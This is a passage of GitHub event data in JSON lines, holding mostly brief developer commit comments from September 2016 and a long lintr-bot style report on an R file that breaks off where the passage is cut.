{"id":"4580172432","type":"CommitCommentEvent","actor":{"login":"PlekhanovA"},"repo":{"name":"xdevelnet/temp"},"payload":{"comment":{"id":19071206,"position":17,"line":95,"path":"ore_grow_original_utf8_11.txt","commit_id":"df9c76a1f0e09183d9e25a455e388e9e494788ee","created_at":"2016-09-18T16:10:04Z","updated_at":"2016-09-18T16:10:04Z","body":"Тогда предлагаю промежуточный вариант: заменить несколько букв на звёздочки."}},"created_at":"2016-09-18T16:10:04Z"}
{"id":"4580174847","type":"CommitCommentEvent","actor":{"login":"IBPX"},"repo":{"name":"goatattack/goatattack"},"payload":{"comment":{"id":19071211,"position":null,"line":null,"path":null,"commit_id":"28ccdf8c98f486ff9ce7d25f36321c3e3eae3543","created_at":"2016-09-18T16:11:38Z","updated_at":"2016-09-18T16:11:38Z","body":"No, I should have been more specific. Reading my first comment, it does seem like I'm suggesting removing the music altogether."}},"created_at":"2016-09-18T16:11:38Z"}
{"id":"4580180212","type":"CommitCommentEvent","actor":{"login":"PlekhanovA"},"repo":{"name":"xdevelnet/temp"},"payload":{"comment":{"id":19071218,"position":23,"line":103,"path":"ore_grow_original_utf8_11.txt","commit_id":"df9c76a1f0e09183d9e25a455e388e9e494788ee","created_at":"2016-09-18T16:14:59Z","updated_at":"2016-09-18T16:14:59Z","body":"Ну так ведь он в оригинале использует на работе слова вроде \"shit\" и \"fuck\", поэтому 8ман и называет его \"Informal man\". Да, \"Неформал\" в России ассоциируется с... неформалами, но я не знаю варианта лучше."}},"created_at":"2016-09-18T16:14:59Z"}
{"id":"4580180373","type":"CommitCommentEvent","actor":{"login":"pjangam"},"repo":{"name":"tavisca-smurkar/FlightBookingSystemWithTaskAndSupplierResponse"},"payload":{"comment":{"id":19071219,"position":124,"line":124,"path":"FlightServiceHost/FlightIISServices/FlightServices/FlightService.cs","commit_id":"ddfd24682f3863b9ed9ac548bf1da59511602de8","created_at":"2016-09-18T16:15:04Z","updated_at":"2016-09-18T16:15:04Z","body":"delay to simulate network behavior?"}},"created_at":"2016-09-18T16:15:04Z"}
{"id":"4580181629","type":"CommitCommentEvent","actor":{"login":"AndreyAkinshin"},"repo":{"name":"PerfDotNet/BenchmarkDotNet"},"payload":{"comment":{"id":19071223,"position":181,"line":32,"path":"src/BenchmarkDotNet.Core/Jobs/JobExtensions.cs","commit_id":"972fee7401c1d460342f5afed07b802513d47445","created_at":"2016-09-18T16:15:50Z","updated_at":"2016-09-18T16:15:50Z","body":">  Is the idea to have a nanosecond based equivalent to TimeSpan? \r\n\r\nKind of.\r\n\r\n> This reads well enough, but mirroring TimeSpan with `TimeInterval.FromMilliseconds(200)` might make it a little more discoverable.\r\n\r\nDone: https://github.com/PerfDotNet/BenchmarkDotNet/commit/ef3ecfad7ba8fa3dd346cdf7165a5b767591007f\r\n\r\n> It's also a breaking change for anyone who has defined their own IConfig.\r\n\r\nThe next release will contain a lot of breaking changes, I have significantly improved Job API. So, it would be `v0.10.0`, not `v0.9.10`."}},"created_at":"2016-09-18T16:15:50Z"}
{"id":"4580181875","type":"CommitCommentEvent","actor":{"login":"PlekhanovA"},"repo":{"name":"xdevelnet/temp"},"payload":{"comment":{"id":19071224,"position":56,"line":163,"path":"ore_grow_original_utf8_11.txt","commit_id":"df9c76a1f0e09183d9e25a455e388e9e494788ee","created_at":"2016-09-18T16:15:59Z","updated_at":"2016-09-18T16:15:59Z","body":"Да, так будет лучше."}},"created_at":"2016-09-18T16:15:59Z"}
{"id":"4580183190","type":"CommitCommentEvent","actor":{"login":"PlekhanovA"},"repo":{"name":"xdevelnet/temp"},"payload":{"comment":{"id":19071225,"position":null,"line":null,"path":null,"commit_id":"df9c76a1f0e09183d9e25a455e388e9e494788ee","created_at":"2016-09-18T16:16:46Z","updated_at":"2016-09-18T16:16:46Z","body":"Это не баг, а фича. Всё ок"}},"created_at":"2016-09-18T16:16:46Z"}
{"id":"4580188393","type":"CommitCommentEvent","actor":{"login":"Josharias"},"repo":{"name":"Terasology/TutorialWorldGeneration"},"payload":{"comment":{"id":19071233,"position":null,"line":null,"path":null,"commit_id":"e2329aff62b30d14483935c290fff9c7129e983c","created_at":"2016-09-18T16:20:05Z","updated_at":"2016-09-18T16:20:05Z","body":"Nicely done!"}},"created_at":"2016-09-18T16:20:05Z"}
{"id":"4580189994","type":"CommitCommentEvent","actor":{"login":"pjangam"},"repo":{"name":"tavisca-smurkar/FlightBookingSystemWithTaskAndSupplierResponse"},"payload":{"comment":{"id":19071235,"position":46,"line":46,"path":"FlightServiceHost/FlightIISServices/FlightServices/FlightService.cs","commit_id":"ddfd24682f3863b9ed9ac548bf1da59511602de8","created_at":"2016-09-18T16:21:03Z","updated_at":"2016-09-18T16:21:03Z","body":"See what does Results do if supplier don't return result in 30 seconds. (delay is missing as well)"}},"created_at":"2016-09-18T16:21:03Z"}
{"id":"4580192002","type":"CommitCommentEvent","actor":{"login":"gialloporpora"},"repo":{"name":"mozilla-l10n/appstores"},"payload":{"comment":{"id":19071236,"position":5,"line":6,"path":"it/whatsnew/whatsnew_android_50_beta.lang","commit_id":"6c9de083f06af24a34b700470879a3466c769fca","created_at":"2016-09-18T16:22:16Z","updated_at":"2016-09-18T16:22:16Z","body":"OK, grazie Sara, dopo vedo di modificarla.\n\n\n"}},"created_at":"2016-09-18T16:22:16Z"}
{"id":"4580192596","type":"CommitCommentEvent","actor":{"login":"Mysterium"},"repo":{"name":"cooler-SAI/JadeCore548-patched"},"payload":{"comment":{"id":19071237,"position":null,"line":null,"path":null,"commit_id":"3a30b511413ff873af4cfef095391b1808bc5304","created_at":"2016-09-18T16:22:38Z","updated_at":"2016-09-18T16:22:38Z","body":"You are a god :dancer: "}},"created_at":"2016-09-18T16:22:38Z"}
{"id":"4580194176","type":"CommitCommentEvent","actor":{"login":"tranglt58"},"repo":{"name":"truonganhhoang/int3507-2016"},"payload":{"comment":{"id":19071239,"position":null,"line":null,"path":null,"commit_id":"2d487b008b83553b65d47fdb6f379a00cf85d014","created_at":"2016-09-18T16:23:37Z","updated_at":"2016-09-18T16:23:37Z","body":"Quang ơi, phần hướng phát triển"}},"created_at":"2016-09-18T16:23:37Z"}
{"id":"4580195755","type":"CommitCommentEvent","actor":{"login":"pjangam"},"repo":{"name":"tavisca-smurkar/FlightBookingSystemWithTaskAndSupplierResponse"},"payload":{"comment":{"id":19071241,"position":21,"line":21,"path":"FlightServiceHost/FlightIISServices/FlightServices/FlightService.cs","commit_id":"ddfd24682f3863b9ed9ac548bf1da59511602de8","created_at":"2016-09-18T16:24:39Z","updated_at":"2016-09-18T16:24:39Z","body":"Always use relative paths. You can not ensure file will be at same path at server.\r\nAlso file path should be configurable. Use web.config for configurations."}},"created_at":"2016-09-18T16:24:39Z"}
{"id":"4580197434","type":"CommitCommentEvent","actor":{"login":"klenovdima"},"repo":{"name":"klenovdima/TestingGit"},"payload":{"comment":{"id":19071246,"position":null,"line":null,"path":null,"commit_id":"43810635bac3fca805f62652656a78162259ff03","created_at":"2016-09-18T16:25:45Z","updated_at":"2016-09-18T16:25:45Z","body":"new VC"}},"created_at":"2016-09-18T16:25:45Z"}
{"id":"4580197894","type":"CommitCommentEvent","actor":{"login":"covyta"},"repo":{"name":"btchip/trezor-security-exploits"},"payload":{"comment":{"id":19071248,"position":null,"line":null,"path":null,"commit_id":"6584542e8e1cd6100c45aab502a1d7fd03b071cd","created_at":"2016-09-18T16:26:04Z","updated_at":"2016-09-18T16:26:04Z","body":"So nice"}},"created_at":"2016-09-18T16:26:04Z"}
{"id":"4580198839","type":"CommitCommentEvent","actor":{"login":"ujwalp15"},"repo":{"name":"GLUG-REVA/GLUG-REVA.github.io"},"payload":{"comment":{"id":19071251,"position":null,"line":null,"path":null,"commit_id":"9b52409ed3fbd4ad78053e8fc4bce2fbf411315f","created_at":"2016-09-18T16:26:41Z","updated_at":"2016-09-18T16:26:41Z","body":"this wont work, tried it long back"}},"created_at":"2016-09-18T16:26:41Z"}
{"id":"4580199584","type":"CommitCommentEvent","actor":{"login":"klenovdima"},"repo":{"name":"klenovdima/TestingGit"},"payload":{"comment":{"id":19071253,"position":null,"line":null,"path":null,"commit_id":"afe4ab3592d4420d6a598a4810d91e283af48099","created_at":"2016-09-18T16:27:12Z","updated_at":"2016-09-18T16:27:12Z","body":"creating new vc"}},"created_at":"2016-09-18T16:27:12Z"}
{"id":"4580200602","type":"CommitCommentEvent","actor":{"login":"covyta"},"repo":{"name":"btchip/trezor-security-exploits"},"payload":{"comment":{"id":19071255,"position":1,"line":1,"path":"README.md","commit_id":"6584542e8e1cd6100c45aab502a1d7fd03b071cd","created_at":"2016-09-18T16:27:48Z","updated_at":"2016-09-18T16:27:48Z","body":"Thank"}},"created_at":"2016-09-18T16:27:48Z"}
{"id":"4580200765","type":"CommitCommentEvent","actor":{"login":"sant0ro"},"repo":{"name":"sant0ro/Yupi"},"payload":{"comment":{"id":19071256,"position":160,"line":160,"path":"Yupi.Model/Domain/Util/TString.cs","commit_id":"4bc3edd65375eeccde8e7e51226b03a6716f2d76","created_at":"2016-09-18T16:27:54Z","updated_at":"2016-09-18T16:27:54Z","body":"What's this weird code?"}},"created_at":"2016-09-18T16:27:54Z"}
{"id":"4580203176","type":"CommitCommentEvent","actor":{"login":"ara4n"},"repo":{"name":"matrix-org/matrix-js-sdk"},"payload":{"comment":{"id":19071260,"position":null,"line":null,"path":null,"commit_id":"4f22610499a7463342dfa74a12c9cfa6941ad10c","created_at":"2016-09-18T16:29:30Z","updated_at":"2016-09-18T16:29:30Z","body":"heh, i think this was mainly me being thick. thanks for clarifying though :)"}},"created_at":"2016-09-18T16:29:30Z"}
{"id":"4580204416","type":"CommitCommentEvent","actor":{"login":"SoUnd001"},"repo":{"name":"MSM8226-Samsung/android_device_samsung_ms01lte"},"payload":{"comment":{"id":19071264,"position":null,"line":null,"path":null,"commit_id":"1e24bf1fd77a95729907a310abc5575eddf3448d","created_at":"2016-09-18T16:30:16Z","updated_at":"2016-09-18T16:30:16Z","body":"Not enought space on device...."}},"created_at":"2016-09-18T16:30:16Z"}
{"id":"4580205803","type":"CommitCommentEvent","actor":{"login":"blub07"},"repo":{"name":"githubschool/open-enrollment-classes-introduction-to-github"},"payload":{"comment":{"id":19071272,"position":null,"line":null,"path":null,"commit_id":"b2a761e0ef5350b08565eebdd74b03a6a4c9dc20","created_at":"2016-09-18T16:31:08Z","updated_at":"2016-09-18T16:31:08Z","body":"i need a guide"}},"created_at":"2016-09-18T16:31:08Z"}
{"id":"4580205944","type":"CommitCommentEvent","actor":{"login":"sant0ro"},"repo":{"name":"sant0ro/Yupi"},"payload":{"comment":{"id":19071273,"position":3,"line":79,"path":"Yupi.Model/Domain/Catalog/Layout/DefaultCatalogLayout.cs","commit_id":"e4f4e7db6e74def027e39004c5c83eedae5f787e","created_at":"2016-09-18T16:31:15Z","updated_at":"2016-09-18T16:31:15Z","body":"@ZakAmirz here it's how @TheDoct0r11 does an example of population, like you said how you does."}},"created_at":"2016-09-18T16:31:15Z"}
{"id":"4580206881","type":"CommitCommentEvent","actor":{"login":"blub07"},"repo":{"name":"githubschool/open-enrollment-classes-introduction-to-github"},"payload":{"comment":{"id":19071277,"position":null,"line":null,"path":null,"commit_id":"b2a761e0ef5350b08565eebdd74b03a6a4c9dc20","created_at":"2016-09-18T16:31:47Z","updated_at":"2016-09-18T16:31:47Z","body":"now\r\n\r\n"}},"created_at":"2016-09-18T16:31:47Z"}
{"id":"4580207012","type":"CommitCommentEvent","actor":{"login":"okurz"},"repo":{"name":"os-autoinst/os-autoinst-needles-opensuse"},"payload":{"comment":{"id":19071278,"position":null,"line":null,"path":null,"commit_id":"3a8a9f8a3b7c92562c8ca2b3a56f354140d2b328","created_at":"2016-09-18T16:31:50Z","updated_at":"2016-09-18T16:31:50Z","body":"that's a wrong needle. Reboot is not selected but Logout. Also, I recommend to not name it \"Leap422\" as it's not very specific to Leap42.2. It does have the Leap background but the rest is Plasma5.8. We need the same needle on Krypton/Argon."}},"created_at":"2016-09-18T16:31:50Z"}
{"id":"4580210416","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"thijsjanzen/STEPCAM"},"payload":{"comment":{"id":19071282,"position":null,"line":null,"path":null,"commit_id":"d91cf846a66b758e0b0bbc298e0d638165ec7ad0","created_at":"2016-09-18T16:33:46Z","updated_at":"2016-09-18T16:33:46Z","body":"[R/ABC_SMC.R:2:1:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L2) *style:* **Variable and function names should be all lowercase.**\n```r\n​getRandomVals <- function(max_val)  {\n^~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:15:1:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L15) *style:* **Variable and function names should be all lowercase.**\n```r\n​getFromPrevious <- function(inds, ws, disps, filts, comps)  {\n^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:22:1:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L22) *style:* **Variable and function names should be all lowercase.**\n```r\n​calculateWeight <- function(params, target, sigma,\n^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:29:5:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L29) *style:* **Variable and function names should be all lowercase.**\n```r\n​    prevP <- c(disp_vals[i], filt_vals[i], comp_vals[i])\n    ^~~~~\n```\n[R/ABC_SMC.R:30:30:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L30) *style:* **Variable and function names should be all lowercase.**\n```r\n​    diff <- params[target] - prevP[target]\n                             ^~~~~\n```\n[R/ABC_SMC.R:37:1:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L37) *style:* **Variable and function names should be all lowercase.**\n```r\n​normalizeWeights <- function(x) {\n^~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:71:1:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L71) *style:* **Variable and function names should be all lowercase.**\n```r\n​calculateDistance <- function(rich, even, div, opt_diff, obs, sd_vals)  {\n^~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:75:40:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L75) *style:* **Put spaces around all infix operators.**\n```r\n​  fit_optima <- (opt_diff / sd_vals[4])^2;\n                                      ~^~\n```\n[R/ABC_SMC.R:83:21:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L83) *style:* **Variable and function names should be all lowercase.**\n```r\n​ABC_SMC <- function(numParticles, species_fallout, taxa, esppres, n_traits,\n                    ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:85:46:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L85) *style:* **Variable and function names should be all lowercase.**\n```r\n​                    abundances, frequencies, stopRate, Ord)  {\n                                             ^~~~~~~~\n```\n[R/ABC_SMC.R:89:3:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L89) *style:* **Variable and function names should be all lowercase.**\n```r\n​  dispVals <- 1:numParticles\n  ^~~~~~~~\n```\n[R/ABC_SMC.R:89:17:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L89) *style:* **Variable and function names should be all lowercase.**\n```r\n​  dispVals <- 1:numParticles\n                ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:90:3:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L90) *style:* **Variable and function names should be all lowercase.**\n```r\n​  filtVals <- 1:numParticles\n  ^~~~~~~~\n```\n[R/ABC_SMC.R:90:17:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L90) *style:* **Variable and function names should be all lowercase.**\n```r\n​  filtVals <- 1:numParticles\n                ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:91:3:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L91) *style:* **Variable and function names should be all lowercase.**\n```r\n​  compVals <- 1:numParticles\n  ^~~~~~~~\n```\n[R/ABC_SMC.R:91:17:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L91) *style:* **Variable and function names should be all lowercase.**\n```r\n​  compVals <- 1:numParticles\n                ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:93:13:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L93) *style:* **Variable and function names should be all lowercase.**\n```r\n​  fits <- 1:numParticles\n            ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:94:3:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L94) *style:* **Variable and function names should be all lowercase.**\n```r\n​  RichVec <- 1:numParticles\n  ^~~~~~~\n```\n[R/ABC_SMC.R:94:16:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L94) *style:* **Variable and function names should be all lowercase.**\n```r\n​  RichVec <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:95:3:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L95) *style:* **Variable and function names should be all lowercase.**\n```r\n​  EveVec <- 1:numParticles\n  ^~~~~~\n```\n[R/ABC_SMC.R:95:15:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L95) *style:* **Variable and function names should be all lowercase.**\n```r\n​  EveVec <- 1:numParticles\n              ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:96:3:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L96) *style:* **Variable and function names should be all lowercase.**\n```r\n​  DivVec <- 1:numParticles\n  ^~~~~~\n```\n[R/ABC_SMC.R:96:15:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L96) *style:* **Variable and function names should be all lowercase.**\n```r\n​  DivVec <- 1:numParticles\n              ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:97:3:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L97) *style:* **Variable and function names should be all lowercase.**\n```r\n​  OptVec <- 1:numParticles\n  ^~~~~~\n```\n[R/ABC_SMC.R:97:15:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L97) *style:* **Variable and function names should be all lowercase.**\n```r\n​  OptVec <- 1:numParticles\n              ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:99:3:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L99) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nextDisp <- dispVals\n  ^~~~~~~~\n```\n[R/ABC_SMC.R:99:15:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L99) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nextDisp <- dispVals\n              ^~~~~~~~\n```\n[R/ABC_SMC.R:100:3:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L100) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nextFilt <- filtVals\n  ^~~~~~~~\n```\n[R/ABC_SMC.R:100:15:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L100) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nextFilt <- filtVals\n              ^~~~~~~~\n```\n[R/ABC_SMC.R:101:3:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L101) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nextComp <- compVals\n  ^~~~~~~~\n```\n[R/ABC_SMC.R:101:15:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L101) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nextComp <- compVals\n              ^~~~~~~~\n```\n[R/ABC_SMC.R:103:21:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L103) *style:* **Variable and function names should be all lowercase.**\n```r\n​  weights <- rep(1, numParticles)\n                    ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:104:3:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L104) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nextWeights <- rep(1, numParticles)\n  ^~~~~~~~~~~\n```\n[R/ABC_SMC.R:104:25:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L104) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nextWeights <- rep(1, numParticles)\n                        ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:105:16:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L105) *style:* **Variable and function names should be all lowercase.**\n```r\n​  indices <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:116:5:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L116) *style:* **Variable and function names should be all lowercase.**\n```r\n​    dispVals <- d[, 1]\n    ^~~~~~~~\n```\n[R/ABC_SMC.R:117:5:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L117) *style:* **Variable and function names should be all lowercase.**\n```r\n​    filtVals <- d[, 2]\n    ^~~~~~~~\n```\n[R/ABC_SMC.R:118:5:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L118) *style:* **Variable and function names should be all lowercase.**\n```r\n​    compVals <- d[, 3]\n    ^~~~~~~~\n```\n[R/ABC_SMC.R:123:11:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L123) *style:* **Variable and function names should be all lowercase.**\n```r\n​    if (d[numParticles, 1] == numParticles) {\n          ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:123:31:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L123) *style:* **Variable and function names should be all lowercase.**\n```r\n​    if (d[numParticles, 1] == numParticles) {\n                              ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:141:5:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L141) *style:* **Variable and function names should be all lowercase.**\n```r\n​    numberAccepted <- 0\n    ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:142:28:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L142) *style:* **Variable and function names should be all lowercase.**\n```r\n​    if (t != 1) weights <- normalizeWeights(weights)\n                           ^~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:142:28:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L142) *warning:* **no visible global function definition for ‘normalizeWeights’**\n```r\n​    if (t != 1) weights <- normalizeWeights(weights)\n                           ^~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:150:12:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L150) *style:* **Variable and function names should be all lowercase.**\n```r\n​    while (numberAccepted < numParticles) {\n           ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:150:29:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L150) *style:* **Variable and function names should be all lowercase.**\n```r\n​    while (numberAccepted < numParticles) {\n                            ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:154:19:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L154) *style:* **Variable and function names should be all lowercase.**\n```r\n​        params <- getRandomVals(species_fallout)\n                  ^~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:154:19:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L154) *warning:* **no visible global function definition for ‘getRandomVals’**\n```r\n​        params <- getRandomVals(species_fallout)\n                  ^~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:156:19:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L156) *style:* **Variable and function names should be all lowercase.**\n```r\n​        params <- getFromPrevious(indices, weights,\n                  ^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:157:35:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L157) *style:* **Variable and function names should be all lowercase.**\n```r\n​                                  dispVals, filtVals, compVals)\n                                  ^~~~~~~~\n```\n[R/ABC_SMC.R:157:45:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L157) *style:* **Variable and function names should be all lowercase.**\n```r\n​                                  dispVals, filtVals, compVals)\n                                            ^~~~~~~~\n```\n[R/ABC_SMC.R:157:55:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L157) *style:* **Variable and function names should be all lowercase.**\n```r\n​                                  dispVals, filtVals, compVals)\n                                                      ^~~~~~~~\n```\n[R/ABC_SMC.R:158:19:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L158) *warning:* **no visible global function definition for ‘perturb’**\n```r\n​        params <- perturb(params, sigma)\n                  ^~~~~~~\n```\n[R/ABC_SMC.R:186:20:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L186) *style:* **Variable and function names should be all lowercase.**\n```r\n​      FD_output <- strippedDbFd(Ord, communities[, present_species])\n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:186:20:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L186) *warning:* **no visible global function definition for ‘strippedDbFd’**\n```r\n​      FD_output <- strippedDbFd(Ord, communities[, present_species])\n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:187:1:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L187) *style:* **lines should not be more than 80 characters.**\n```r\n​      FRic <- FD_output$FRic # FRic = functional richness (Villeger et al, 2008, Ecology)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:188:1:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L188) *style:* **lines should not be more than 80 characters.**\n```r\n​      FEve <- FD_output$FEve # FEve = functional evenness (Villeger et al, 2008, Ecology)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:189:1:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L189) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  } else 